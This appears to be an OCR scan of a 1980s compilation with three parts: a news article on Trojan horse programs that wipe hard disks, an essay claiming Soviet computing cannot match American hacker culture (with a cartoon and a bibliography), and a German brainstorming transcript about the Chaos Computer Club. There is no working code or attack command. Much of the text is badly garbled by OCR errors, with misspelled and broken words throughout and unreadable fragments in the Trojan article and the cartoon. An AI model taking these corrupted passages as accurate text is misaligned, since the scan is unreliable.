"It's like poisoning the candy in the supcrmarkcl on 
Halloween," said Ross M. Greenberg, a Manhattan Comput¬ 
er Consultant. "I guess the people who devise these ihings 
takc pleasufe in destroying other people’s work." 

The programs began appearing several years ago and now 
have reached a level of sophistication that allows ihem to 
sometimes oullox Computer experts who are on guard lor 

Kjiown as Trojan horses, or more famibarly as Trojans^ 
Ihe programs pretend to be something uscful, like Word 
Processor or game board. But they are eleclroiuc teiionsts, 
ready to erase or scramble data stored m Computers. 

Ainong the doeens of Trojans in circulation, some bepn 
their deslruction wilhin minules. Others perform as legili- 
matc Software for weeks or momhs. then louch off an 
electronic time bomb. 

"A person may lose live minutes of work —or lwo years 
nl work said Mr. Greenberg. who mainiains several "tools 
o( defense" againsl Trojans, includmg a Software piogram 


that alerls him to suspicious activiiy within his personal 

^’LSte'huudreds of other Computer enthusiasts across the 
country Mr. Greenberg operales a Computer buUetm board 
as a pub'Uc Service. Each sysop, shorthand for System opera- 
tor the board operators are caUed, keeps a Computer 
hoöked up to a telephone linc 24 hours a day, providing a 

'Over a year of work could be 
destroyed. If you’re using ihe 
Computer for business, how do 
you explaiu that sorl of thing to 
your boss?’ 

—• Eric ISewhouMe, a compuler expert 

Clearing house for hundreds of free "pubUc domain" soft- 

* P^pKnnecl their Computers in» buU^ boar^ 

via Xhonc-bookup devices called 

nale programs and make copies of programs already pos 

on the boards. u . , th, 

. The Trojan Software represents anolher ebapter in th 
exploits of the Computer hackers. who Invest countless hours 
in compuierized subterfuge. . , 

••There are hacksoul there who tcally amuse people with 
iheir Cleverness." said Dave Bayer, an asstslanl Professor 0 
maihcmatics at Columbia University in New York. Bul the 




hacks wbo write Trojans are simply nican-spirij^ 
malicious. There’s no skill invoWed in trashing pcopl^'j 
disks." 

A hard disk, the primary storage unit of advanced Derson* 
al Computers, can hold the equivalcnt of 400 to 
of sin^c-spaced lypcwrillen data. Like tape casseii^ 
disks can ^ erased, inlentionally or not. ’ 

The Trojans work by giving Ihe Computer inteniaj instnio 
lions, bul whiie preiending to perform somc 
Function the instructions amount lo elecironic suicid^ c 
Trojans only scramble or erase the “file allocalion tablc^Jhe 
computcr’s indes of where data are slored on a hard d'* i- k 
user can often still retrievc the data, although with 
Bul others, aflor erasing the tablc, procced to instni h 
Computer lo do a “low-lcvel formal,” or erasure. of • 

disk ‘beeniue 

‘•Conceivably, upwards of over a year of woiV could be 
deslroyed," said Kc Newhouse, an 18-year-ol<l cq-, “, 
experl in Los Angeles, ••!! you're using the «>mput.S. i?, 
business, how do you explain that sort of thius 
boss? 


your 

Users are adjusting to compuler lerrorism by iuerM ■ 
Security. Most bulletin board operators are be^tln^*®* 
check the Identity of people who call up their boar^"t 'j 
they are testing suspicious programs. ■ 

But even if a Trojan perpetralot were idcmifie.j ■, 
uncertain whether any state or federal laws provid»*( 
proscculing that person. ™ 

'•After you’vc been bit once," said Charles E. R» i 
Manhattan Computer user. “you look al every ^ * 

program with a skeptical eye. But every once in a wb:». 
of ihem still sneaks by." ’ 


J 



USSR, the phone lines can't support data 
grade communication.‘‘° They slopped 
using direct dial long-distance calling in 
1982. The KGB found it hard to monitor 
such phone calls.“^' 

But this is a two-way Street. American 
hackers who access a wide variety of 
Computers learn to deal with many kinds 
of Software. They develop sawy that car 
hardly be transcribed any more than yor 
can learn to swim by reading a hook. 
They also learn a lot about Computer 
Security. As they assume positions in 
business and government, they transfer 
this arcane knowledge to their new 
responsibilities. 

Even if the USSR catches up instantly to 
where we are right now, today, they will 
fall behind by sunrise tomorrow. Ameri- 
cans invent new tools every day. 

Take Run Length Limited. It's a way to 
Store 30 megabytes on a 20 megabyte 
disk drive. New a year ago, it is common 
today. 

'''With personal Compu¬ 
ters and dot matrix Prin¬ 
ters at their disposal, the 
nndergronnd wonld 
really give the Soviet 
State something to worry 
about. This has already 
happened in Poland." 

"Goal-Seeker" is an add-on that works 
with several common spreadsheets. You 
put in the figures you want to have for the 
result and the program juggles the 
spreadsheet to make the numbers come 
out right. (Just what every Soviet factory 
manager needs!) This program is a 
“Shareware“ product created by a 
hacker; it is available for less than $10. 
There are over 800 such Software pack- 
ages for IBM PC-type machines. 
Hundreds more exist for Apple, Commo- 
dore and most other Computers. 

In about two years the 514 inch 
diskette will be as old-fashioned as the 8 
inch diskette is today. The 3.5 inch 
diskette is coming. There are portable 
Computers that will use 2.5 inch 
diskettes. Two years from now, the 
Soviets will still be trying to get 1.2 
megabytes on a 5*4 inch diskette (Stand¬ 
ard with the IBM-PC/AT). We will be 
putting twice that much on a floppy half 
that size. 

Non-von is short for non-von Neumann 
(after Dr. John von Neumann who, in the 
late 1940s, outlined digital Computer 
principles). Instead of being one- 
instruction-at-a-time processors, they 
are parallel devices. These new Compu¬ 
ters process several instructions at the 
same time. Biochips are on the horizon. 
Based on living materials, these Chips can 
be used for non-von Computers and to 
run prosthetic devices.“^ 

When Dr. Bores investigated the Agat, 
he used Locksmith 5.0, a program to 
copy protected disks.'^^ Locksmith is now 
available for the IBM-PC. Locksmith also 
has dozens of competitors. There are 
similar programs for other Computers, 


such as Kräcker Jack for the Commodore 
64. 

"People in East Enrope 
receive Western televi- 
sion. The USSR now pro- 
duces some video tape 
Cameras and players. 
When Computers and tel- 
e'vision merge the resnlts 
can only be called 'radi- 
caL'" 

There's a program called "PIdD-i-" (Pro- 
ductivity Plus). It lets you defme keys and 
sets of keys for writing text. For instance, 
you can program "asap" to give you the 
phrase "as soon as possible." You can 
defme "mom" to mean the three lines in 
your mother's name, address, City, state 
and zip. Using a routine like this, you can 
type up to 150 words per minute. 

And yet, for all of our prowess, there 
are signs that the Computer revolution is 
slowing down. The Intel 803 8 6 chip 
(used in the IBM Personal System 2) has 
bugs. Over 100,000 were installed that 
wouldn't do 32-bit arithmetic.'’'* This 
could be an indication of what happens 
when entrepreneurs become corporate 
directors. When "three men in a garage" 
become a "publicly owned" Corporation, 
something is bound to go wrong. 

"The Computer is a tool 
for personal freedom. 
Like gold money, the 
Computer cannot be 
made to serve its 
destroyers/' 

About 15 years ago, two young compu-, 
ter nerds in Britain developed a program- 
ming language that is well suited to 
defining facts and rules about compli- 
cated Systems. It was ignored in America 
until 198 5 when Japan's Ministry of 
Industry announced that the Prolog lan¬ 
guage from Clocksin and Mellish would 
be part of their "Fifth Generation" effort. 

"This nnderscores one of 
several deficiencies in 
Soviet Computer policy. 
They identify with our 
imperialist institutions." 

Fortunafely, America is not saddled 
with a centralized economy. Now we have 
several versions of Prolog on the market 
including one for about $100 (Borland's 
"Turbo Prolog") and a "public domain" 
Prolog for $10. 

This article has mentioned the Intel 
processor family several times. Actually, 
hardcore hackers consider the Intel Chips 
"brain-damaged" (even when they work 
right). "Real programmers" use Motorola 
68000-based machines like the Atari ST, 
Commodore Amiga and Apple Macintosh. 

This underscores one of several defi- 
ciencies in Soviet Computer policy. They 
identify with our imperialist institutions. 
They want to emulate IBM. But the com- 


Television 
and Radio 


A 1966 Cartoon 
by Jenscn 

—“Sunday Telegraph," 
London. 

OUß UEyT PßOaßAMME- 
ALIU IN WONOESLANP- 
la Nor aoiTAQLE 

FOB-CMlLDßE.H. 

-ty- 



OUÜ NEyrPPOGßAMWE- 

mren WITH mother — 

li smrAGLE. ONi.y'. 

Fora. aEueoTic aduLts 
UjITH PAeaNT-FllrATIONS. 



B O" PCOGCAMMeTT 
POLITICAL ' 

NOT 

£. poa. 

ISTS . 



OUO NOtT P«O6,0ANMe 
IS A FBAmC. DlSCuSilON 
OF TME. FOufi-UTTEA. 
woßp OkiR ^OOETV.I 
11 IS NOT SuirASLE ‘ 
FOR CONTEMPOO^/ 
^PKamatists. 



oun Final PEOGHANNe, 
THE ePlCOqUE. 

IS 5UITA0LE ONLT 
FOE athGisU of 
TWELvE And overa. 



rMÖo WOM'T foECiCT 
TO SujircH OFF 
yooE. scrs.wiLu 
•ifC» crriLDkEN ! 











puter revolution did not come from IBM. 
The Computer revolution in America 
came from dropouts, weirdos and nerds. 
Until the USSR can tolerate these people, 
they will never capture the power of the 
Computer. 

This is one lesson the Reds will never 
allow themselves to learn — even Amer¬ 
ica hasn't learned it. The Computer revo¬ 
lution came abouf because there are no 
government regulations on computing. 
AlsrV'ONE can be a program mer, simply by 
claiming to be one. Kids too young to be 
legally employed have earned hefty 
incomes from writing Software. Several 
of the most profitable "Adventure" 
games were created by a housewife wdth 
two babies. 

"If the USSR wants a 
Computer literate Soc¬ 
iety, they should buy all 
the outdated 8-bit ma- 
chines in America." 

These kinds of graphics oriented 
games led to cheap CAD (Computer aided 
design) drafting Systems. The USSR man- 
aged to Slip 40 Tektronix Workstations 
out of West Germany.'*® 

Meanwhile, you can buy powerful CAD 
Software for any home Computer for less 
Ihan S100. (PC Sig has a four-disk set for 
$24.) 

The Soviet Union's efforts to acquire 
Western Technology usually support 
military goals. Yet the USSR has failed to 
utilize the greatest military weapon in 
America: the videogame. The Reds may 
have a few of the "Battle Zone" tank 
game. We have thousands being used 
everyday by would-be armor soldiers. 
Millions of American kids have played 
"Star Wars" and "Mach II." Of course, 
military applications are just the tip of 
the iceberg. 

In a World where Information is wealth, 
the Soviet Union is poor. America has 
thousands of Computer bulletin board 
Services. The BBS fever has even infected 
our own government. You can linkup 
with the Department of Commerce's 
microcomputer support group at (301) 
948-5718. The private databases (Com¬ 
puServe, Dialog, Nexis, etc.) lower above 
the government's and are themselves 
eclipsed by the thousands of hobbyist 
bulletin Boards. Typical of these is the 
John Galt Line, at (305) 235-1645. 

The Soviet Union can never catch up to 
America in Computer technology. If they 
dismantled their state, they might 
achieve the technological prowess of 
Brazil by the year 2000. The Computer is 
a tool for personal freedom. Like gold 
money, the Computer cannot be made to 
serve its destroyers. 



BIBUOGRAPHIC NOTES 

This article was made possible by database 
searches on the InfoTrac and CLSI public library 
Systems and also IQuest from the Computer 
Information Service (CompuServe) of Columbus. 
Ohio, wbich ofcourse would have been impossi- 
bie in the USSR. Also, the Central Intelligence 
Agency was kind enough to honor a Freedom of 
Information Act request within 30 days. The 
Soviet Embassy Press Attache took several 
months Io suggest that I shop at any of three 
recommended bookstores. 


t. Soviet Acquisition of MiUtarily Signiflcant 
Western Technology: an Update, Central Intel¬ 
ligence Agency, 1985. 

2. Ibid. 

3. Electronics Research and Technology in the 
USSR, Emmanuel Piore, Central Intelligence 
Agency, 197G. 

4. Op. eit. 

5. Ibid., (cf ref 23, this Tigure is quoted as 400 
to 500). 

6. "Computer Gamesman," loyce Barnathan, 
AfeivsivfieA', Nov. 18, 1985. 

7. Ibid. 

8. "Soviets Launch Computer Literacy Drive," 
Constance Holden, Science, Jan. 10, 1988. 

9. "Computer Gamesman." 

10. Op. cit. 

11. Ibid. 

12. "Moscow Faces the New Age," Mark Whi- 
taker, et al., Newsweek, Aug. 18, 1986. 

13. "Soviets Launch Computer Literacy Drive." 

14. "U.S. Computers May Enroll in Moscow U," 
Mark D'Anaslasio, et al., Business Week, Feb 
4, 1985. 

15. Op. cit. 

16. "Agat: A Soviel Apple II Computer," Dr. Leo D. 
Bores, ByTe, Nov. 1984. 

17. Ibid. 

18. "The State of Computer Technology in the 
Soviel Union," Durk Pe'arson, transcribed' 


remarks from The Future of Freedom rnnfer 
ence,Nov. 1986. » uoiuer 

19. "Soviets Launch Computer Literacy Drive" 

20. Op. cit. 

21. "Agat: A Soviet Apple II Computer," 

22. "The Great Soviet Computer Screw-up' 
Daniel Seligman, Fortune, july 8, 1985 

23. "Soviet Microprocessors and Microcomnu- 

ters," Ruth Heuertz, Byte, Apr. 1984 ^ 

24. Ibid. 

25. Ibid 

26. Op. cit. 

27. "Moscow Faces the New Age." , 

28. Ibid \ 

29. 'The Great Soviet Computer Screw-up " 

30. "Soviets Launch Computer Literacy Drive" ' 

31. "Moscow Faces the New Age." I 

32. "Slow Scan to Moscow," Adam Horh«rhiM 

Mother Jones, lune, 19 8 6. cnsctuld 

33. Ibid 

34. Ibid 

35. "War by Microcomputer," Time Tut« nn 

1984. ' y i 

36. Ibid 

37. "Computer Gamesman." 

38. 'The State of Computer Technolotrv in thf 
Soviet Union." 

39. "Soviets Launch Computer Literacy Drive" 

40. Ibid 

41. "Moscow Faces the New Age." 

42. Advanced Computers: Parallel and Binrhis 

Processors, Norman W. Lord, et al.. Arm Arbor 
Science, 1985. j 

43. "Agat: A Soviel Apple 11 Computer." | 

44. "Intel's Chips have huss,"Fortune, June 8 
1987. 

45. "How those Computers got to Moscow" Frc 

deric A Miller, et al., Business lYeeA- n'n, ot 
1986. □ -uct. 20 





Minus Delta talks 

Auszüge aus einem Brainstorming 15.3.1988 


m: Mike (Minus Delta t) 
e: Eva (Frau an Bord) 
p: Poetronic (Dichter) 

m: Was ich nicht sehen will in dieser Hackerei: 
Irgendwelche Romantik-Geschichten, die 
kompetente Leute - wozu ich auch Wau zähle, 
und die ich einfach phantastisch finde von 
Technik und Motorik - da abziehen. 

: Der Chaos Computer Club - so wie ich die 
eutchen kenne -, das ist die inhomogenste 
Versammlung von Menschen, die mir jemals 
begegnet ist. Wobei der Computer dabei zu 
sowas wie einem sozialen Katalysator wird. Ein 
Katalysator ist ja eigentlich ein Stoff, der sich 
selber nicht verändert, aber verändernd wirkt. 
Du stellst einen Computer hin, und davor findet 
sich einträchtig eine Schar von Menschen zu¬ 
sammen, die, würden sie sich in einer Kneipe 
treffen, sich nie im Leben anquatschen würden 
oder gemeinsam an einen Tisch setzen. Aus 
allen ideologischen Bereichen. Da findest du 
den Althippie mit Sandale und Karotte im linken 
Mundwinkel genauso wie einen Typen, wo du 
sagen möchtest: Junge Union. ’Nen Typen, der 
in elf Vereinen ist. ’Nen Typen wie Wau, wo du 
glaubst, der kommt grade aus dem Dschungel, 
sowas Waldschrathaftes. Vic, so ein Schmaler 
Schneller, Ingeniöser, mit seinem Porsche. 
Und dann noch so ein paar wilde Düsentriebs. 
Und die sitzen alle traulich vordieser Maschine. 
Der Haufen ist auch deshalb interessant, weil; 
Wenn du eine Sache durchsprichst mit allen, 
dann kriegst du ein derartiges Interessens¬ 
spektrum zusammen, eine derartig scharfe Ar¬ 
gumentationsanforderung, daß wirklich nur die 
besten Gedanken und Argumente durchkom¬ 
men. 

m; Aber wer selektiert denn? Das ist der Punkt. 

p: Es gibt in bestimmten Situationen bestimmte 
Leute, die selektieren. Jeder ist für sich ein 
Entscheider, weil die Autorität relativ locker und 
situationsbedingt im Club herumwandert. 

m; Jetzt kann ich ja mal von mir her erklären, 
weshalb wir überhaupt so viel über die Ge¬ 
schichte reden. 


p: Das wundert mich schon längst. Ich wollte 
eigentlich überhaupt nicht über Computer re¬ 
den. 

m:Ja. Es geht jetzt nicht um Computer. Es geht 
darum, daß ohne Zweifel die Leute in diesem 
Bereich irgendwann in den nächsten fünf Jah¬ 
ren gesellschaftliche Verantwortung überneh¬ 
men werden, wollen, was auch immer. Kom¬ 
petente Gutachter werden. In welcher Form 
auch. Sie werden wie heilige Kühe behandelt 
und sind eigentlich von A bis Z, ich sag’s wieder; 
Betrüger. 

p; ’Ne heilige Kuh schmeißt das BKA nicht um 
sechs Uhr morgens aus dem Bett. 

m; Das ist die Partisanennummer, wo man dann 
sagt: Ja, damals., und so. 

p: Worüber wir reden, das sind alles verschie¬ 
dene Aspekte ein und desselben Gegenstands. 
Du kannst auch sagen: Ein und desselben 
Menschen. Diese verschiedenen Seelen, Ge¬ 
danken und Ansätze, die hat jeder drin. Die 
romantische Ecke auf der einen Seite. Dann 
schnappst du wieder um in so einen wilden, 
aufklärerischen Impetus und sagst: Hau weg 
den Scheiß, oder sonstwas. 

m: Ja, aber gewisse Freiräume, die gemacht 
werden, und die etabliert werden - und zwar 
durch die Praxis und sonst nix - und hingestellt 
werden, existieren dann als Referenzen. Und 
der ganze CCC und auch gewisse andere Leu¬ 
te - auch Sachen, die wir als Gruppe immer 
gemacht haben -, sind als Referenzmodelle 
möglich: Daß es auch anders geht. Irgendwann 
ist ja der ganze Scheiß total zubetoniert.. . 

p; Du bist soo negativ. 

m: Sicher zubetoniert. Stimmt doch. Weil ich die 
ganze Zeit immer neue Freiräume aufmachen 
muß, wo eine gewisse Generosität oder eine 
gewisses-verstehste, philosophisch gesehen 
- Freidenkertum da ist und nicht ein Clubden¬ 
ken, ein kommerzielles Denken, ein Sekten¬ 
denken, oder eine philosophisch vorgefertigte 
Schablonennummer. 

p: Möglicherweise ist es so.. Du bistja immer im 


-ü- 



Fronteinsatz, und meine Art zu arbeiten und zu 
wirken ist anders, nämlich mit dem Schreiben. 
Du stehst jedesmal vor einem Mysterium. Du 
schreibst ein Buch, das wird verkauft, 10.000, 
20.000 Stück, die verschwinden im Nichts. Du 
weißt überhaupt nicht. . . du redest, wenn du 
Glück hast, mit ein paar Leuten, die dein Buch 
in die Hände gekriegt und gelesen haben. Der 
Rest verschwindet und versickert. Du weißt 
nicht, was du wirkst. Ob du wirkst. Ob du jetzt 
nur was wie ein Papiertaschentuch gemacht 
hast, reinschneuzen, weg. . . Und ich weiß 
auch, ich muß jeden Tag mein Glaubensbe¬ 
kenntnis ablegen und mir sagen: Ich weiß, daß 
es mit Sprache geht. Es ist ein virulentes Ar¬ 
beiten. Es hat nicht so eine Unmittelbarkeit, wie 
wenn du direkt im Raum arbeitest. 

m: Es geht ja nicht nur direkt um Raum. 

p: Vielleicht ist das ein berufsbedingter Opti¬ 
mismus, den ich hab. 

m: Gut, du hast einen berufsbedingten Opti¬ 
mismus. Hast vielleicht im Delirium angefan¬ 
gen, hast ein paar Modelle dokumentiert. Ich 
bin jetzt vollkommen subjektiv. 'Delirium’ jetzt 
nicht negativ: Mit einer gewissen Ehrlichkeit. 
Genauso wie die ganzen Chaosleute auch an¬ 
gefangen haben mit einer gewissen Ehrlichkeit: 
Erzählen wir doch mal, was wirdenken, was wir 
fühlen, wie abgefahren man ist, das ist lustig. 

p: Delirium ist ok in der Hinsicht. Ich mach ein 
Bild: Du kannst sagen - ich will das jetzt „nicht 
überdramatisieren -, wir haben jetzt den Über¬ 
gang von der Eisenzeit in die Siliziumzeit. Und 
du hast mit dem Delirium insofern recht, als 
alles, was wir heute machen, was die Hacker 
machen, auch wenn's einem so vorkommt, als 
wär man eine Avantgarde, als wäre das das 
neueste an HiTech, was es gibt, nix anderes 
sind als Dinge, die simplen Höhlenkritzeleien 
entsprechen. Der Computer hat im Augenblick 
eine Roheit, das empfindet jeder, der längere 
Zeit damit arbeitet. Es ist eigentlich eine Ver¬ 
gröberung, Verschlechterung, ein Rückschritt 
gegenüber den Arbeitsweisen, die man bisher 
gehabt hat. In vielerlei Hinsicht. Das ist ein 
digitaler Faustkeil. Von daher: Delirium ok. Klei¬ 
nes Beispiel. Ich wollte mir neulich ein neues 
Klingelschild für draußen an der Tür machen, 
mit meinem Namen. Wenn ich noch eine 
Schreibmaschine gehabt hätte, hätt’ ich einen 
kleinen Zettel eingespannt und draufgetippt. 
Bis ich das in meinem Matrixdrucker entspre¬ 
chend justiert habe, die Textverarbeitung ein¬ 
gerichtet, die Datei “Klingels.doc“ geschrieben, 
abgespeichert und zum Druck aufgerufen ha¬ 
be, bin ich alt. Hab ich’s mit dem Filzstift ge¬ 


schrieben und mirgedacht: Wozu hab ich 3000 
Mark für das System ausgegeben? 

e: Das sind ja auch immer solche einmaligen 
Geschichten. Du machst ja nicht jede Woche 
ein neues Klingelschild. 

p: Das war einfach eine Möglichkeit, die mir die 
Schreibmaschine geboten hat, und die am 
Computer weggefallen ist. 

e: Das ist eine einmalige Verzögerung, aber 
dadurch doch auch ’ne ständige Beschleuni¬ 
gung. 



p: Du kannst sogar eine Ästhetik draus machen 
Wie ist die Bauhaus-Asthetik entstanden'? Die 
ist entstanden daraus, daß die damaligen Mö¬ 
belmaschinen nichts anderes konnten, als total 
dumpfe, schlichte, rechtwinklige, unornamen- 
fterte Dinge herzustellen in Serienproduktion 
Genauso die ganzen Computerkrakeleien, wo 

du i^rgendwelche wilden, groben Pixelkörneram 

Bildschirm siehst. 

m. Jetzt aber nicht abschweifen, sondern auf 
den Punkt zurückzukommen. Daß z B von 
einer oralen Gesellschaft - ich zitier jetzt kon 
kret McLuhan: nämlich, daß die Schrift einiae«^ 
verändert hat. Und die Schrift auch, obwohl e? 
kein Problem war, zu einem Machtprogramrn 
wurde. Der Schreiber im Dorf etc. 

p: Wir machen ja jetzt gerade den Versuch 
überzugehen von der Schriftkultur in die digitale 
Kultur. Ins digitale Alphabet, Null, Eins. 

m: Richtig. Und die Vision der Veränderung der 
digitalen Dings ist dir auch noch nicht klar. Und 
ich arbeite jetzt an diesem Brainstormino 
NICHT einer Feststellung von was möglich i^’ 
oder von irgendwelchen Stories, Anekdoten. ’ 

p: Ich bin durch die Gespräche in den letzten 
Tagen ziemlich angekurbelt, weil wir einfach frei 





phantasiert haben. Sachen durchgedacht ha¬ 
ben, ohne Rücksicht auf Verluste. 

m: Mir geht’s jetzt nicht um Rücksicht auf Ver¬ 
luste. Mir gehts darum, die Sache noch weiter 
zu treiben, Psycho-Hacking, Kochrezepte, 
Minderheitenprogramm. Dann: Was ich immer 
wichtiger finde, ist diese Realitäts-Geschichte. 
Ich hab’ mittlerweile einfach drei Geschichten, 
die von den Parametern so beeinflußbar sind, 
daß - wenn du jetzt eine neue Generation von 
Kindern aufziehen wirst, was die für einen Rea¬ 
litätsbegriff haben werden. 

p: Wir haben ein dickes Problem hier in Europa, 
oder in den westlichen Kulturen. Das ist mir 
auch in Ägypten aufgegangen; nämlich den 
Individualismus. Das ist ein sehr großes Pro¬ 
blem. Wenn du ein Individuum bist, brauchst du 
ja eine Privat-Realität. Ich hab mich in Ägypten 
mit einer jungen Koptin unterhalten, die war 24. 
Arbeitet seit fünf Jahren als Tour Managerin für 
ein Reisebüro. Vor drei Jahren ist sie zum 
ersten Mal, weil jemand krank geworden ist, 
nach Oberägypten gefahren mit einer Reise¬ 
gruppe. Zum ersten Mal aus Kairo weg. Da hats 
erstmal wilde Schlachten mit ihrer Familie ge¬ 
geben. Ein unverheiratetes Mädchen, das die 
Nacht nicht zuhause verbringt - das geht nicht. 
Da hat sie riskiert, daß sie am Rande zum 
Nutten-Ansehen steht. Mutter zweimal täglich 
anrufen, Oberägypten ok. Dann ist sie nach 
Oberägypten gefahren, mit der Gruppe auf ein 
Schiff gegangen und hat als Tour Managerin 
eine eigene Kabine bekommen und hat mir 
gesagt: Dann, in der Kabine, war sie zum ersten 
mal in ihrem Leben alleine in einem Zimmer. 
Und sie isttotal ausgeflippt, weil sie nicht wußte, 
was sie tun soll. Ob sie zusperren soll. Hatte 
immer nur Angst, daß da jemand Fremder rein¬ 
kommt. Horror. Und dann ist mir klargeworden: 
Es ist sinnlos, sich mit ihr über so einen Begriff 
wie Privatleben’ zu unterhalten. Vollkommen 
sinnlos. Weil ich erst mindestenstausend Jahre 
europäischer Kulturgeschichte dazuerzählen 
mü ßte. Ich brauch’ mindestens ein halbes Jahr, 
bis ich ihr erklärt habe, was ich meine. 

m: Das ist jetzt der Punkt. Das ist das, was ich 
vorhin mit Tradition auch meinte. Daß z.B. da 
noch gewisse Denkprozesse funktionieren und 
sicher noch 30,40 Jahre funktionieren werden. 
Und ich wiederhole, daß z.B. unsere Deso¬ 
rientierung der letzten Jahrzehnte, nämlich "Pri¬ 
vatisierung“, der Bedürfnisse, der Vorstellun¬ 
gen. .. 

p: Du mußt die Leute privatisieren, wenn du 
ihnen viele Produkte verkaufen willst. Du mußt 
die Familie aufspalten, du mußt die Großfamilie 


aufspalten. Eine Großfamilie kauft sich nur 
einen Fernseher. Das sind 20 Leute, die in 
einem Haus wohnen und alle in denselben 
Fernseherstieren. Die mußt du erst aufspalten, 
die Großeltern in eine Wohneinheit, die Eltern 
in eine und die Kinder in eine, dann kannst du 
schon drei Fernseher verkaufen. 

m: Das ist aber nicht mein Problem. Wenn ich 
z.B. zum Benjamin gehe, dann hat der seinen 
Fernseher in seinem Zimmer, der andere hat 
auch einen TV und dann haben sie noch einen 
TV in der Küche. Und im Badezimmer auch 
noch. 

p: Ich weiß. Ich hab drei Computer hier liegen, 
zwei Videorecorder. .. 

m: Ich glaub, das Problem... Das Bewußtsein 
des Privatlebens ist hier in Europa so entwic¬ 
kelt, daß das eben so funktioniert, während 
man sich vor zehn Jahren noch gestritten hat: 
Ich will Fußball sehen, und ich will aberdie Inge 
Meysel sehen. 

p: Mit den neuen digitalen Videorecorder 
kannst du das machen. Zwei Programme auf 
einem Bild. 

m: Oder parallel aufnehmen, und das andere 
Programm später gucken. Das ist aber jetzt im 
Westen hier. Und das sind die dreißig Jahre 
Vorschuß, und das sind die Geschichten, die, 
wenn einersich wirklich drauf spezialisiert-und 
da gehören wir wahrscheinlich auch mal dazu 
-, als Navigator die Informationen in die richti¬ 
gen Kanäle zu verteilen und zu verdealen. Z.B.: 
Ich geh nach Ägypten und in die Türkei und 
checke, was die dort brauchen und hab die 
richtigen Connections, muß nur meine Kartei 
durchgucken, wer produziert was, was brau¬ 
chen die dort unten, welches Programm wird sie 
interessieren. Bin ich die ganze Zeit. . . mit so 
einem System wie “Infermental“ hab ich per- 
manant 100 Leute im Kopf, weiß, wer was 
benutzt. Hier in Hamburg hab ich schon fünf 
Leuten Bescheid gesagt, direkt neue Infos ge¬ 
kriegt, komm’ dich einmal besuchen, hab’ neue 
Infos. Hab’ das alles drin, als Navigator. Könnte 
ich theoretisch verdealen. Wird auch verdealt 
werden in Zukunft. 

p: Du weißt ja auch, daß das mein Prinzip ist. 
Deswegen hab ich hier mein aufblasbares Kaf¬ 
feehaus. Meine Audienzen. 

e; Das ist ein Vonwurf gegen mich, den ich von 
Benji eingefangen hab. So diese Navigator¬ 
geschichte: zwei Tage in Hamburg, fünf Woh¬ 
nungen an der Hand, und die gleich wieder 




weitergeben, und Jobs... 

n- Benjamin ist grade aus so einem Ge¬ 
schwindigkeitsverlauf wieder ausgestiegen. 
Und das geht ihm zu schnell, das mag er nicht 
im Augenblick. 

m-Bemi kommt jetzt in eine Sache rein: weg von 

der Maschine, nur noch Bodyfeeling, so m diese 
Richtung. Menschliche Wärme, weißgottwas. 
Diese ganze Geschichte. Ich möcht’ wieder 
Natur haben. Ob jetzt positiv oder negativ, ist 
mal außer acht gelassen. Der ist soweit rein- 
qegangen mit den Computern - für sich “j 
er da wieder Distanz haben muß. Es geht mir 
aber nicht um Computer. Du hat jetzt mit dem 
Individuum vorgegriffen. Ich wollte das mit der 
Arbeit noch ausführen. Nämlich die Gras- 
muck-Theorie. Die Arbeit ist vom Stolz her 
abgeschrieben, bis vielleicht fünf Prozent, die 
noch stolz sind auf ihre Arbeit.. 


p: Hier bei uns im Westen. 

m' Da gehören teilweise noch gewisse Künstler 
dazu. Ich rede jetzt vom Westen als der Avant¬ 
garde einer Informationsgesellschaft, und: Wie 
sieht die gesunde Kultur einer westlichen Ge¬ 
sellschaft aus in Zukunft? Eine Kultur, wobench 
glaube, daß die Bedingungen einer gesunden 
Kultur mehrere sind, nämlich: ein gewisser so¬ 
zialer Code und gewisse soziale Grundsätze. 
Jede gesunde Gesellschaft hat einen Freiraurn, 
der frei von Gedanken ist, in Anführungszei¬ 
chen. 


p: Konstruktive Hirnlosigkeit. 

m: Ja, z.B. Meditation ist konstruktive Hirnlo- 
siqkeit. Kirche, weißgottwas, Architektur, rrei- 
räume. Früher war der Begriff Freiraum ai^ 
Land, Space, also Material bezogen. Heute im 
Westen ist der Begriff Material immer mehr in 
Zeit umgesetzt. Wechselt vom Geld zum Zeit¬ 
begriff. 

p: Hast du eigentlich das Gefühl, daß die Hac¬ 
ker, oderdie Computerleute den Kampf um den 
Raum schon aufgegeben haben? 

m: Vorläufig haben sie ihn vergessen. Laß mich 
jetzt mal ausreden. Die Geplänkel mit Raum, 
die ganzen Computergames sind noch auf die¬ 
sem Raum-Kampf-System, Go, oder schach¬ 
mäßig aufgebaut. Das wird wechseln. Da hoffe 
ich schon auf die Transputer. Obwohl dann die 
Zeit-Geschichte - infinite CPU-time - wo, du 
es verstanden hast, haben die Jungs - inter¬ 
essiert mich nicht mehr - nur aus Space ge¬ 
arbeitet. Wenn die Polizei auch immer noch auf 


Space abfährt, und die Hacker auch, da wird i 
nichts rauskommen. Das ist die totale Schi- • 
zophrenie. Und trotzdem wird’s Partisanen wert : 

kriegen, das ist das Gefährliche. Romantik. Das ' 
wird dann Fake. 

p- Ich kann mit Romantikgut umgehen. Weil ich 
ein Romantiker bin und immer wie ein Tier 
gegensteuern muß beim Schreiben. Das gibt 
auch eine ungeheure Produktivität. 

m: Ja, die Romantik ist von der Poesie her eine 
Geschichte. Aber da ist es nicht Poesie, son¬ 
dern inhaltliche Überbrückung einer Leere. Da 
wird die Nostalgie und die Vergangenheit. . . 
p: Das ist so ein Problem. Ich bin Romantiker, 
aber ich hasse Romantik, vor allem, wenn ich 
schreibe. 

m: Wenn du Wau heute sagst: Du hast fünf 
Jahre lang nicht nachgedacht, sondern nur 
reagiert, dann überbrückt ein Wau das in zehn 
Jahren, indem er sagt: Damals war das voller 
Action. Und wenn du ihm sagst: Da ist gar nichts 
gelaufen, dann kommt er mit Zeitungsartikeln 
an, zeigt dir, was da gelaufen ist, macht Bla¬ 
blabla, was WIR damals geleistet haben, wir 
sind ja damals verfolgt worden. Und dieser 
ganze Kack, das ist gefährlich. Es geht um eine 
gesellschaftliche Verantwortung. Das klingt 
jetzt vielleicht vollkommen doof. Ich sag’: Wertn 
wir uns als sowas sehen wie die Konstrukteure 
oderdie Erhalter oder die Bewußtmachereiner 
gewissen neuen westlichen Kultur - neuen 
Kultur heißt einfach; die Entwicklung des indi¬ 
vidualistischen Begriffes in eine Kultur-, sind 
wir auch verantwortlich, daß diese Kultur le¬ 
bensfähig wird und nicht No Future und deka¬ 
dent wird. Und eine Kultur braucht Freiraum 
